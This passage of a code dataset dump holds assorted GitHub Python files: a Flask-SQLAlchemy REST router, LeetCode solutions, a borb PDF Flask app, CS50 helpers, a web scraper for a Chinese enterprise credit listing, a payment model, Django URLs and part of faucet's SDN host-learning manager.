cache_timeout=cache_timeout,\n exception_handler=get_op.exception_handler or default_exception_handler,\n access_checker=get_op.access_checker or default_access_checker,\n id_attr_name=get_op.id_attr or default_id_attr,\n dict_post_processors=get_op.response_dict_modifiers or default_dict_post_processors)\n get_url = get_op.url or '/%s/<_id>' % base_url\n app_or_bp.route(\n get_url, methods=['GET'], endpoint='get_%s' % endpoint_slug)(\n get_func)\n views[_model_name]['get'] = {edk.URL: get_url}\n\n if entity.post:\n post_op = entity.post\n if callable(post_op.input_schema_modifier):\n post_input_schema = post_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n 
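# No input_schema_modifier hook was supplied for POST, so the model's default input schema is used as-is.\n            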
else:\n post_input_schema = model_default_input_schema\n post_func = post_op.view_function or construct_post_view_function(\n _model, post_input_schema,\n entities_group=self,\n pre_processors=post_op.before_save,\n post_processors=post_op.after_save,\n schemas_registry=schemas_registry,\n allow_unknown_fields=allow_unknown_fields,\n dict_struct=post_op.response_dict_struct or dict_struct_for_model,\n exception_handler=post_op.exception_handler or default_exception_handler,\n access_checker=post_op.access_checker or default_access_checker,\n remove_property_keys_before_validation=post_op.remove_property_keys_before_validation \n if post_op.remove_property_keys_before_validation is not None\n else remove_property_keys_before_validation,\n remove_relationship_keys_before_validation=post_op.remove_relationship_keys_before_validation \n if post_op.remove_relationship_keys_before_validation is not None \n else remove_relationship_keys_before_validation,\n remove_assoc_proxy_keys_before_validation=post_op.remove_assoc_proxy_keys_before_validation\n if post_op.remove_assoc_proxy_keys_before_validation is not None \n else remove_assoc_proxy_keys_before_validation,\n fields_allowed_to_be_set=post_op.settable_fields or fields_allowed_to_be_set_for_all_views,\n fields_forbidden_from_being_set=union([\n fields_forbidden_from_being_set_for_all_views,\n post_op.non_settable_fields or []\n ]))\n post_url = post_op.url or \"/%s\" % base_url\n app_or_bp.route(\n post_url, methods=['POST'], endpoint='post_%s' % endpoint_slug)(\n post_func)\n views[_model_name]['post'] = {edk.URL: post_url}\n if callable(post_op.input_schema_modifier):\n views[_model_name]['post']['input_schema'] = post_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if entity.put:\n put_op = entity.put\n if callable(put_op.input_schema_modifier):\n put_input_schema = put_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n put_input_schema = model_default_input_schema\n put_func = put_op.view_function or construct_put_view_function(\n _model, put_input_schema,\n entities_group=self,\n permitted_object_getter=put_op.permitted_object_getter or entity.permitted_object_getter,\n pre_processors=put_op.before_save,\n post_processors=put_op.after_save,\n dict_struct=put_op.response_dict_struct or dict_struct_for_model,\n allow_unknown_fields=allow_unknown_fields,\n query_constructor=put_op.query_modifier or default_query_constructor,\n schemas_registry=schemas_registry,\n exception_handler=put_op.exception_handler or default_exception_handler,\n access_checker=put_op.access_checker or default_access_checker,\n remove_property_keys_before_validation=put_op.remove_property_keys_before_validation \n if put_op.remove_property_keys_before_validation is not None \n else remove_property_keys_before_validation,\n remove_relationship_keys_before_validation=put_op.remove_relationship_keys_before_validation\n if put_op.remove_relationship_keys_before_validation is not None\n else remove_relationship_keys_before_validation,\n remove_assoc_proxy_keys_before_validation=put_op.remove_assoc_proxy_keys_before_validation\n if put_op.remove_assoc_proxy_keys_before_validation is not None\n else remove_assoc_proxy_keys_before_validation,\n fields_allowed_to_be_set=put_op.settable_fields or fields_allowed_to_be_set_for_all_views,\n fields_forbidden_from_being_set=union([\n fields_forbidden_from_being_set_for_all_views,\n put_op.non_settable_fields or []\n ]))\n put_url = put_op.url or \"/%s/<_id>\" % 
base_url\n app_or_bp.route(\n put_url, methods=['PUT'], endpoint='put_%s' % endpoint_slug)(\n put_func)\n views[_model_name]['put'] = {edk.URL: put_url}\n if callable(put_op.input_schema_modifier):\n views[_model_name]['put']['input_schema'] = put_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if entity.patch:\n patch_op = entity.patch\n if callable(patch_op.input_schema_modifier):\n patch_input_schema = patch_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n patch_input_schema = model_default_input_schema\n patch_func = patch_op.view_function or construct_patch_view_function(\n _model, patch_input_schema,\n pre_processors=patch_op.before_save,\n commands=patch_op.commands,\n post_processors=patch_op.after_save,\n query_constructor=patch_op.query_modifier or default_query_constructor,\n permitted_object_getter=patch_op.permitted_object_getter or entity.permitted_object_getter,\n schemas_registry=schemas_registry,\n exception_handler=patch_op.exception_handler or default_exception_handler,\n access_checker=patch_op.access_checker or default_access_checker,\n dict_struct=patch_op.response_dict_struct or dict_struct_for_model)\n patch_url = patch_op.url or \"/%s/<_id>\" % base_url\n app_or_bp.route(\n patch_url, methods=['PATCH'], endpoint='patch_%s' % endpoint_slug)(\n patch_func)\n views[_model_name]['patch'] = {edk.URL: patch_url}\n if callable(patch_op.input_schema_modifier):\n views[_model_name]['patch']['input_schema'] = patch_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if entity.delete:\n delete_op = entity.delete\n delete_func = delete_op.view_function or construct_delete_view_function(\n _model,\n query_constructor=delete_op.query_modifier or default_query_constructor,\n pre_processors=delete_op.before_save,\n permitted_object_getter=delete_op.permitted_object_getter or entity.permitted_object_getter,\n post_processors=delete_op.after_save,\n exception_handler=delete_op.exception_handler or default_exception_handler,\n access_checker=delete_op.access_checker or default_access_checker)\n delete_url = delete_op.url or \"/%s/<_id>\" % base_url\n app_or_bp.route(\n delete_url, methods=['DELETE'], endpoint='delete_%s' % endpoint_slug)(\n delete_func)\n views[_model_name]['delete'] = {edk.URL: delete_url}\n\n if entity.batch_save:\n batch_save_op = entity.batch_save\n if callable(batch_save_op.input_schema_modifier):\n batch_save_input_schema = batch_save_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n batch_save_input_schema = model_default_input_schema\n batch_save_func = batch_save_op.view_function or construct_batch_save_view_function(\n _model, batch_save_input_schema,\n app_or_bp=app_or_bp,\n pre_processors_for_post=fetch_nested_key(entity, 'post.before_save'),\n pre_processors_for_put=fetch_nested_key(entity, 'put.before_save'),\n post_processors_for_post=fetch_nested_key(entity, 'post.after_save'),\n post_processors_for_put=fetch_nested_key(entity, 'put.before_save'),\n extra_pre_processors=batch_save_op.extra_actions_before_save,\n extra_post_processors=batch_save_op.extra_actions_after_save,\n unique_identifier_fields=batch_save_op.unique_identifier_fields,\n dict_struct=batch_save_op.response_dict_struct or dict_struct_for_model,\n allow_unknown_fields=allow_unknown_fields,\n query_constructor=batch_save_op.query_modifier or default_query_constructor,\n schemas_registry=schemas_registry,\n exception_handler=batch_save_op.exception_handler 
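\n                # fall back to the entity-level or router-wide exception handler when the batch-save op does not define one\n                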
or default_exception_handler,\n                tmp_folder_path=tmp_folder_path,\n                fields_forbidden_from_being_set=union([\n                    fields_forbidden_from_being_set_for_all_views,\n                    batch_save_op.non_settable_fields or []\n                ]),\n                celery_worker=celery_worker,\n                result_saving_instance_model=batch_save_op.result_saving_instance_model,\n                result_saving_instance_getter=batch_save_op.result_saving_instance_getter,\n                run_as_async_task=batch_save_op.run_as_async_task,\n                update_only=batch_save_op.update_only, create_only=batch_save_op.create_only,\n                skip_pre_processors=batch_save_op.skip_pre_processors,\n                skip_post_processors=batch_save_op.skip_post_processors\n            )\n            batch_save_url = batch_save_op.url or \"/batch-save/%s\" % base_url\n            app_or_bp.route(\n                batch_save_url, methods=['POST'], endpoint='batch_save_%s' % endpoint_slug)(\n                batch_save_func)\n            views[_model_name]['batch_save'] = {edk.URL: batch_save_url}\n            if callable(batch_save_op.input_schema_modifier):\n                views[_model_name]['batch_save']['input_schema'] = batch_save_op.input_schema_modifier(\n                    deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n        if register_schema_definition:\n            def schema_def():\n                return Response(\n                    json.dumps(\n                        registry,\n                        default=json_encoder, sort_keys=True),\n                    200, mimetype='application/json')\n            if cache_handler:\n                schema_def = cache_handler.cached(timeout=86400)(schema_def)\n            app_or_bp.route(schema_def_url, methods=['GET'])(schema_def)\n\n        if register_views_map:\n            def views_map():\n                return Response(\n                    json.dumps(\n                        registry[edk.OPERATION_MODIFIERS],\n                        default=json_encoder, sort_keys=True),\n                    200, mimetype='application/json')\n            if cache_handler:\n                views_map = cache_handler.cached(timeout=86400)(views_map)\n            app_or_bp.route(views_map_url, methods=['GET'])(views_map)\n\n\n","repo_name":"SuryaSankar/flask-sqlalchemy-booster","sub_path":"flask_sqlalchemy_booster/entities_router/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":50680,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"30022068566","text":"# encoding: utf-8\n\"\"\"\n@author: Dianlei Zhang\n@contact: dianlei.zhang@qq.com\n@time: 2018/12/18 4:01 PM\n\"\"\"\n\n\ndef solve(board):\n    \"\"\"\n    :type board: List[List[str]]\n    :rtype: void Do not return anything, modify board in-place instead.\n    \"\"\"\n    if board:\n\n        queue = []\n\n        for index, i in enumerate(board[0]):\n            if i == \"O\":\n                board[0][index] = \"-\"\n                queue.append([0, index])\n\n        for index, i in enumerate(board[-1]):\n            if i == \"O\":\n                board[len(board) - 1][index] = \"-\"\n                queue.append([len(board) - 1, index])\n\n        for i in range(len(board)):\n            if board[i][0] == \"O\":\n                board[i][0] = \"-\"\n                queue.append([i, 0])\n\n        for i in range(len(board)):\n            if board[i][-1] == \"O\":\n                board[i][len(board[0]) - 1] = \"-\"\n                queue.append([i, len(board[0]) - 1])\n\n        while queue:\n            top = queue.pop(0)\n            x, y = top[0], top[1]\n            # enqueue the \"O\" neighbours above, below, to the left and to the right\n            if x - 1 > 0 and board[x - 1][y] == \"O\":\n                board[x - 1][y] = \"-\"\n                queue.append([x - 1, y])\n            if x + 1 < len(board) and board[x + 1][y] == \"O\":\n                board[x + 1][y] = \"-\"\n                queue.append([x + 1, y])\n            if y - 1 > 0 and board[x][y - 1] == \"O\":\n                board[x][y - 1] = \"-\"\n                queue.append([x, y - 1])\n            if y + 1 < len(board[0]) and board[x][y + 1] == \"O\":\n                board[x][y + 1] = \"-\"\n                queue.append([x, y + 1])\n\n        for i in range(len(board)):\n            for j in range(len(board[0])):\n                if board[i][j] == \"O\":\n                    board[i][j] = \"X\"\n                if board[i][j] == \"-\":\n                    board[i][j] = \"O\"\n\n    return board\n\n\nif __name__ == 
'__main__':\n    board = [\n        [\"X\", \"O\", \"X\", \"X\", \"X\"],\n        [\"X\", \"X\", \"O\", \"X\", \"O\"],\n        [\"O\", \"X\", \"X\", \"X\", \"X\"],\n        [\"X\", \"X\", \"O\", \"X\", \"X\"]\n    ]\n\n    board = [\n    ]\n\n    board = [[\"O\", \"O\", \"O\"], [\"O\", \"O\", \"O\"], [\"O\", \"O\", \"O\"]]\n\n    print(solve(board))\n","repo_name":"zhangdianlei/LeetCode_python","sub_path":"src/part2/c130.py","file_name":"c130.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6567318259","text":"#\n# @lc app=leetcode id=212 lang=python3\n#\n# [212] Word Search II\n#\n\n# @lc code=start\n\n\nclass TrieNode:\n    def __init__(self):\n        self.children = {}\n        self.isWord = False\n\n    def addWord(self, word):\n        cur = self\n        for c in word:\n            if c not in cur.children:\n                cur.children[c] = TrieNode()\n            cur = cur.children[c]\n        cur.isWord = True\n\n\nclass Solution:\n    def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n        root = TrieNode()\n        for w in words:\n            root.addWord(w)\n\n        row, col = len(board), len(board[0])\n        res, visit = set(), set()\n\n        def dfs(r, c, node, word):\n\n            if (\n                r < 0\n                or c < 0\n                or r == row\n                or c == col\n                or board[r][c] not in node.children\n                or (r, c) in visit\n            ):\n                return\n            visit.add((r, c))\n\n            node = node.children[board[r][c]]\n            word += board[r][c]\n            if node.isWord:\n                res.add(word)\n                node.isWord = False\n\n            dfs(r + 1, c, node, word)\n            dfs(r - 1, c, node, word)\n            dfs(r, c + 1, node, word)\n            dfs(r, c - 1, node, word)\n            visit.remove((r, c))\n\n        for i in range(row):\n            for j in range(col):\n                dfs(i, j, root, \"\")\n\n        return list(res)\n\n\n# @lc code=end\n","repo_name":"chojs23/problemSolving","sub_path":"leetcode/212.word-search-ii.py","file_name":"212.word-search-ii.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"31638626786","text":"from flask import Flask, render_template, request\nfrom flask.helpers import make_response\nfrom borb.pdf.canvas.layout.page_layout.multi_column_layout import SingleColumnLayout\nfrom borb.pdf.canvas.layout.text.paragraph import Paragraph\nfrom borb.pdf.document import Document\nfrom borb.pdf.page.page import Page\nfrom borb.pdf.pdf import PDF\nimport io\nimport os\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef hello_world():\n    return render_template(\"screengrab.html\")\n\n\n@app.route(\"/<name>\")\ndef hello_name(name):\n    viewport_height = request.cookies.get(\"viewportHeight\")\n    viewport_width = request.cookies.get(\"viewportWidth\")\n\n    return \"
Hello, {}! Your viewport size is {}x{}.
\".format(\n        name, viewport_width, viewport_height\n    )\n\n\n@app.route(\"/pdf/<name>.pdf\")\ndef hello_pdf(name):\n    viewport_width = request.cookies.get(\"viewportWidth\")\n    viewport_height = request.cookies.get(\"viewportHeight\")\n    if viewport_width is None or viewport_height is None:\n        viewport_size = []\n    else:\n        viewport_size = [int(viewport_width), int(viewport_height)]\n\n    # create an empty Document\n    pdf = Document()\n\n    # add an empty Page\n    page = Page(*viewport_size)\n    pdf.append_page(page)\n\n    # use a PageLayout (SingleColumnLayout in this case)\n    layout = SingleColumnLayout(page)\n\n    # add a Paragraph object\n    p = Paragraph(\n        f\"Hello World! Your computer screen size is {viewport_width}x{viewport_height}. Click me! I'm a link!\"\n    )\n    layout.add(p)\n\n    # add a link to the layout\n    page.append_remote_go_to_annotation(p.get_bounding_box(), uri=\"/\")\n\n    # binary_pdf = io.BytesIO()\n    # PDF.dumps(binary_pdf, pdf)\n\n    # print(binary_pdf.read())\n    # print(pdf.pages)\n\n    # response = make_response(binary_pdf.read())\n\n    with open(\"test.pdf\", \"wb\") as binary_pdf:\n        PDF.dumps(binary_pdf, pdf)\n\n    with open(\"test.pdf\", \"rb\") as binary_pdf:\n        response = make_response(binary_pdf.read())\n\n    response.headers[\"Content-Type\"] = \"application/pdf\"\n    response.headers[\"Content-Disposition\"] = 'filename=\"%s.pdf\"' % name\n    return response\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"theonesean/responsive-pdfsite","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2199145709","text":"from nltk.tokenize import sent_tokenize\n\n\ndef lines(a, b):\n    \"\"\"Return lines in both a and b\"\"\"\n\n    # Split each string into lines\n    LinesA = set(a.splitlines())\n    LinesB = set(b.splitlines())\n\n    return LinesA & LinesB\n\n\ndef sentences(a, b):\n    \"\"\"Return sentences in both a and b\"\"\"\n\n    # Split each string into sentences\n    SentencesA = set(sent_tokenize(a))\n    SentencesB = set(sent_tokenize(b))\n\n    return SentencesA & SentencesB\n\n\ndef substrings(a, b, n):\n    \"\"\"Return substrings of length n in both a and b\"\"\"\n\n    SubstringsA = substring_divider(a, n)\n    SubstringsB = substring_divider(b, n)\n\n    identical_substrings = set()\n    for substring in SubstringsA:\n        if substring in SubstringsB:\n            identical_substrings.add(substring)\n\n    return identical_substrings\n\n\ndef substring_divider(s, n):\n    \"\"\"Return the set of substrings of length n in s\"\"\"\n\n    substrings = set()\n    while True:\n        if len(s) < n:\n            break\n        else:\n            substring = s[0:n]\n            substrings.add(substring)\n            s = s[1:]\n    return substrings","repo_name":"jdonahue135/CS50","sub_path":"pset7/similarities/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8658058889","text":"__author__ = 'Chen'\n#coding=utf-8\n# If reading the POST response fails, refresh the page in the browser or use \"Edit and Resend\"\nimport urllib.request,urllib.parse\nimport re\nfrom datetime import *\nfrom YCParser import YCParser\n\nclass GetYCParser(YCParser):\n\n    def changedate(self,fdate): # normalise the date format\n        if (fdate.find('年')==-1)&(fdate.find('-')==-1):\n            cdate=date(int(fdate[0:4]),int(fdate[4:6]),int(fdate[6:8]))\n        else:\n            if fdate.find('-')!=-1:\n                fdate=fdate.replace('-','年',1)\n                fdate=fdate.replace('-','月',1)\n                fdate=fdate+'日'\n            reg=r'年(.*?)月'\n            pattern=re.compile(reg)\n            
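# e.g. '2019-01-05' was rewritten to '2019年01月05日' above, so changedate('2019-01-05') -> date(2019, 1, 5)\n            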
month=int(pattern.findall(fdate)[0])\n reg=r'月(.*?)日'\n pattern=re.compile(reg)\n day=int(pattern.findall(fdate)[0])\n cdate=date(int(fdate[0:4]),month,day)\n return cdate\n\n def getpostdata(self,pageNos):\n postdata=urllib.parse.urlencode({\n 'searchContent':'',\n 'page':'%d'% pageNos\n }).encode('utf-8')\n return postdata\n\n def getentlist(self,startdate,enddate):\n pageNos=0\n while True:\n try:\n pageNos+=1\n if pageNos>18678:break\n req=urllib.request.Request(\n url='http://tjcredit.gov.cn/platform/saic/exclist.ftl',\n data=self.getpostdata(pageNos),\n headers={'User-Agent':'Magic Browser'}\n )\n result=self.gethtml(req)\n infolist=result.findAll('li',attrs={'class':'tb-a1'})\n datelist=result.findAll('li',attrs={'class':'tb-a3'})\n l=len(datelist)\n del infolist[0]\n del datelist[0]\n except Exception:\n self.printpageerror(pageNos)\n continue\n else:\n print('Page %d Reading' % pageNos)\n k=0\n for i in range(l):\n try:\n cdate=str(datelist[i].contents[0])\n cdate=self.changedate(cdate)\n if (cdate>=startdate)&(cdate<=enddate):\n Name=infolist[i].find('a').contents[0].replace('\\n','').strip()\n if self.checkname(Name)==False:continue\n href=infolist[i].find('a').get('href')\n reg=r'entId=(.*)'\n pattern=re.compile(reg)\n entId=pattern.findall(href)[0]\n entdict=dict(Name=Name,entId=entId)\n self.PrintInfo(entdict,self.f)\n if cdate tuple:\n \"\"\" Collection amount \"\"\"\n return float(self.collection[\"amount\"]), self.collection[\"currency\"]\n\n @property\n def date(self) -> datetime:\n \"\"\" Collection date \"\"\"\n return date_time.parse_json_date(self.collection[\"date\"])\n\n @property\n def description(self) -> str:\n \"\"\" Description \"\"\"\n return self.collection[\"description\"]\n\n @property\n def json(self) -> dict:\n \"\"\" Collection in JSON format \"\"\"\n return self.collection\n\n@dataclass\nclass Recurrence:\n \"\"\" Payment recurrence \"\"\"\n recurrence: dict\n\n @property\n def amount(self) -> tuple:\n \"\"\" Amount \"\"\"\n return float(self.recurrence[\"amount\"]), self.currency\n\n @property\n def collections(self) -> list:\n \"\"\" All collections in recurrence \"\"\"\n output = []\n for col in self.recurrence[\"collections\"]:\n output.append(Collection(col))\n return output\n\n @property\n def currency(self) -> str:\n \"\"\" Currency \"\"\"\n return self.recurrence[\"currency\"]\n\n @property\n def expected_payment_date(self) -> datetime:\n \"\"\" Expected payment date \"\"\"\n return date_time.parse_json_date(self.recurrence[\"expected_payment_date\"])\n\n @expected_payment_date.setter\n def expected_payment_date(self, date: datetime):\n \"\"\" Expected payment date \"\"\"\n self.recurrence[\"expected_payment_date\"] = date.isoformat()\n\n @property\n def open_amount(self) -> tuple:\n \"\"\" Open amount \"\"\"\n if self.cleared:\n return 0, self.currency\n\n open_amount, open_currency = self.amount\n currency_conv = CurrencyConverter()\n\n for coll in self.collections:\n coll_amount, coll_curr = coll.amount\n converted_coll_amount = currency_conv.convert_to_currency(\n coll_amount,\n coll_curr,\n open_currency)\n open_amount -= converted_coll_amount\n\n return open_amount, open_currency\n\n @property\n def paid_amount(self) -> tuple:\n \"\"\" Paid amount \"\"\"\n full_amount, full_currency = self.amount\n open_amount, open_currency = self.open_amount\n assert full_currency == open_currency\n return (full_amount - open_amount), full_currency\n\n @property\n def realistic_payment_date(self) -> datetime:\n \"\"\" Realistic payment date \"\"\"\n epd 
= self.expected_payment_date\n rcd = self.recurrence_date\n\n if epd > rcd:\n output = epd\n else:\n output = rcd\n\n return date_time.get_nearest_workday(output, backwards=True)\n\n @property\n def json(self) -> dict:\n \"\"\" Recurrence as JSON (dict) \"\"\"\n return self.recurrence\n\n @property\n def recurrence_date(self) -> datetime:\n \"\"\" Recurrence date \"\"\"\n return date_time.parse_json_date(self.recurrence[\"recurrence_date\"])\n\n @property\n def approaching_or_late(self) -> bool:\n \"\"\" Is recurrence approaching or late? \"\"\"\n if self.cleared:\n return False\n return self.recurrence_date <= datetime.datetime.now() + datetime.timedelta(\n days=config.CONSTANTS[\"PAYMENT_NOTIFICATION_BUFFER\"])\n\n @property\n def cleared(self) -> bool:\n \"\"\" Is recurrence cleared? \"\"\"\n return self.recurrence[\"cleared\"]\n\n @cleared.setter\n def cleared(self, cleared: bool):\n \"\"\" Is recurrence cleared? \"\"\"\n self.recurrence[\"cleared\"] = cleared\n\n def add_collection(self, collection: Collection):\n \"\"\" Add new collection \"\"\"\n self.recurrence[\"collections\"].append(collection.json)\n\n def toggle_cleared(self):\n \"\"\" Toggle cleared forth and back \"\"\"\n if self.cleared:\n self.cleared = False\n else:\n self.cleared = True\n","repo_name":"keremkoseoglu/Kifu","sub_path":"model/payment/recurrence.py","file_name":"recurrence.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39094793002","text":"from . import views\nfrom django.urls import path, include\n\nurlpatterns = [\n path(\"\", views.show_all_objec),\n path(\"grups\", views.Show_all_grups.as_view(), name='all_grups'),\n path(\"grups/\", views.DetailGrup.as_view(), name='one_grup'),\n path(\"grups//\", views.random_objecs, name='random_objecs'),\n path('__debug__/', include('debug_toolbar.urls')),\n]\n\n","repo_name":"lemon1964/KidLogic","sub_path":"Extra_item/Item/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6520880909","text":"from faucet import valve_of\nfrom faucet.valve_manager_base import ValveManagerBase\n\n\nclass ValveHostManager(ValveManagerBase):\n \"\"\"Manage host learning on VLANs.\"\"\"\n\n def __init__(self, logger, ports, vlans, eth_src_table, eth_dst_table,\n eth_dst_hairpin_table, pipeline, learn_timeout, learn_jitter,\n learn_ban_timeout, cache_update_guard_time, idle_dst, stack,\n has_externals, stack_root_flood_reflection):\n self.logger = logger\n self.ports = ports\n self.vlans = vlans\n self.eth_src_table = eth_src_table\n self.eth_dst_table = eth_dst_table\n self.eth_dst_hairpin_table = eth_dst_hairpin_table\n self.pipeline = pipeline\n self.learn_timeout = learn_timeout\n self.learn_jitter = learn_jitter\n self.learn_ban_timeout = learn_ban_timeout\n self.low_priority = self._LOW_PRIORITY\n self.host_priority = self._MATCH_PRIORITY\n self.cache_update_guard_time = cache_update_guard_time\n self.output_table = self.eth_dst_table\n self.idle_dst = idle_dst\n self.stack = stack\n self.has_externals = has_externals\n self.stack_root_flood_reflection = stack_root_flood_reflection\n if self.eth_dst_hairpin_table:\n self.output_table = self.eth_dst_hairpin_table\n\n def ban_rules(self, pkt_meta):\n \"\"\"Limit learning to a maximum configured on this port/VLAN.\n\n Args:\n pkt_meta: PacketMeta instance.\n Returns:\n list: OpenFlow messages, if 
any.\n \"\"\"\n ofmsgs = []\n\n port = pkt_meta.port\n eth_src = pkt_meta.eth_src\n vlan = pkt_meta.vlan\n\n entry = vlan.cached_host(eth_src)\n if entry is None:\n if port.max_hosts:\n if port.hosts_count() == port.max_hosts:\n ofmsgs.append(self._temp_ban_host_learning(\n self.eth_src_table.match(in_port=port.number)))\n port.dyn_learn_ban_count += 1\n self.logger.info(\n 'max hosts %u reached on %s, '\n 'temporarily banning learning on this port, '\n 'and not learning %s' % (\n port.max_hosts, port, eth_src))\n if vlan is not None and vlan.max_hosts:\n hosts_count = vlan.hosts_count()\n if hosts_count == vlan.max_hosts:\n ofmsgs.append(self._temp_ban_host_learning(self.eth_src_table.match(vlan=vlan)))\n vlan.dyn_learn_ban_count += 1\n self.logger.info(\n 'max hosts %u reached on VLAN %u, '\n 'temporarily banning learning on this VLAN, '\n 'and not learning %s on %s' % (\n vlan.max_hosts, vlan.vid, eth_src, port))\n return ofmsgs\n\n def del_port(self, port):\n ofmsgs = []\n ofmsgs.append(\n self.eth_src_table.flowdel(self.eth_src_table.match(in_port=port.number)))\n for table in (self.eth_dst_table, self.eth_dst_hairpin_table):\n if table:\n # per OF 1.3.5 B.6.23, the OFA will match flows\n # that have an action targeting this port.\n ofmsgs.append(table.flowdel(out_port=port.number))\n vlans = port.vlans()\n if port.stack:\n vlans = self.vlans.values()\n for vlan in vlans:\n vlan.clear_cache_hosts_on_port(port)\n return ofmsgs\n\n def initialise_tables(self):\n ofmsgs = []\n for vlan in self.vlans.values():\n ofmsgs.append(self.eth_src_table.flowcontroller(\n match=self.eth_src_table.match(vlan=vlan),\n priority=self.low_priority,\n inst=[self.eth_src_table.goto(self.output_table)]))\n return ofmsgs\n\n def _temp_ban_host_learning(self, match):\n return self.eth_src_table.flowdrop(\n match,\n priority=(self.low_priority + 1),\n hard_timeout=self.learn_ban_timeout)\n\n def delete_host_from_vlan(self, eth_src, vlan):\n \"\"\"Delete a host from a VLAN.\"\"\"\n ofmsgs = [self.eth_src_table.flowdel(\n self.eth_src_table.match(vlan=vlan, eth_src=eth_src))]\n for table in (self.eth_dst_table, self.eth_dst_hairpin_table):\n if table:\n ofmsgs.append(table.flowdel(table.match(vlan=vlan, eth_dst=eth_src)))\n return ofmsgs\n\n def expire_hosts_from_vlan(self, vlan, now):\n \"\"\"Expire hosts from VLAN cache.\"\"\"\n expired_hosts = vlan.expire_cache_hosts(now, self.learn_timeout)\n if expired_hosts:\n vlan.dyn_last_time_hosts_expired = now\n self.logger.info(\n '%u recently active hosts on VLAN %u, expired %s' % (\n vlan.hosts_count(), vlan.vid, expired_hosts))\n return expired_hosts\n\n def _jitter_learn_timeout(self, base_learn_timeout, port, eth_dst):\n \"\"\"Calculate jittered learning timeout to avoid synchronized host timeouts.\"\"\"\n # Hosts on this port never timeout.\n if port.permanent_learn:\n return 0\n if not base_learn_timeout:\n return 0\n # Jitter learn timeout based on eth address, so timeout processing is jittered,\n # the same hosts will timeout approximately the same time on a stack.\n jitter = hash(eth_dst) % self.learn_jitter\n min_learn_timeout = base_learn_timeout - self.learn_jitter\n return int(max(abs(min_learn_timeout + jitter), self.cache_update_guard_time))\n\n def learn_host_timeouts(self, port, eth_src):\n \"\"\"Calculate flow timeouts for learning on a port.\"\"\"\n learn_timeout = self._jitter_learn_timeout(self.learn_timeout, port, eth_src)\n\n # Update datapath to no longer send packets from this mac to controller\n # note the use of hard_timeout here and 
idle_timeout for the dst table\n # this is to ensure that the source rules will always be deleted before\n # any rules on the dst table. Otherwise if the dst table rule expires\n # but the src table rule is still being hit intermittantly the switch\n # will flood packets to that dst and not realise it needs to relearn\n # the rule\n # NB: Must be lower than highest priority otherwise it can match\n # flows destined to controller\n src_rule_idle_timeout = 0\n src_rule_hard_timeout = learn_timeout\n dst_rule_idle_timeout = learn_timeout + self.cache_update_guard_time\n if not self.idle_dst:\n dst_rule_idle_timeout = 0\n return (src_rule_idle_timeout, src_rule_hard_timeout, dst_rule_idle_timeout)\n\n def learn_host_intervlan_routing_flows(self, port, vlan, eth_src, eth_dst):\n \"\"\"Returns flows for the eth_src_table that enable packets that have been\n routed to be accepted from an adjacent DP and then switched to the destination.\n Eth_src_table flow rule to match on port, eth_src, eth_dst and vlan\n\n Args:\n port (Port): Port to match on.\n vlan (VLAN): VLAN to match on\n eth_src: source MAC address (should be the router MAC)\n eth_dst: destination MAC address\n \"\"\"\n ofmsgs = []\n (src_rule_idle_timeout, src_rule_hard_timeout, _) = self.learn_host_timeouts(port, eth_src)\n src_match = self.eth_src_table.match(vlan=vlan, eth_src=eth_src, eth_dst=eth_dst)\n src_priority = self.host_priority - 1\n inst = [self.eth_src_table.goto(self.output_table)]\n ofmsgs.extend([self.eth_src_table.flowmod(\n match=src_match,\n priority=src_priority,\n inst=inst,\n hard_timeout=src_rule_hard_timeout,\n idle_timeout=src_rule_idle_timeout)])\n return ofmsgs\n\n def learn_host_on_vlan_port_flows(self, port, vlan, eth_src,\n delete_existing, refresh_rules,\n src_rule_idle_timeout,\n src_rule_hard_timeout,\n dst_rule_idle_timeout):\n \"\"\"Return flows that implement learning a host on a port.\"\"\"\n ofmsgs = []\n\n # Delete any existing entries for MAC.\n if delete_existing:\n ofmsgs.extend(self.delete_host_from_vlan(eth_src, vlan))\n\n # Associate this MAC with source port.\n src_match = self.eth_src_table.match(\n in_port=port.number, vlan=vlan, eth_src=eth_src)\n src_priority = self.host_priority - 1\n\n inst = []\n\n inst.append(self.eth_src_table.goto(self.output_table))\n\n ofmsgs.append(self.eth_src_table.flowmod(\n match=src_match,\n priority=src_priority,\n inst=inst,\n hard_timeout=src_rule_hard_timeout,\n idle_timeout=src_rule_idle_timeout))\n\n hairpinning = port.hairpin or port.hairpin_unicast\n # If we are refreshing only and not in hairpin mode, leave existing eth_dst alone.\n if refresh_rules and not hairpinning:\n return ofmsgs\n\n external_forwarding_requested = None\n match_dict = {\n 'vlan': vlan, 'eth_dst': eth_src, valve_of.EXTERNAL_FORWARDING_FIELD: None}\n if self.has_externals:\n match_dict.update({\n valve_of.EXTERNAL_FORWARDING_FIELD: 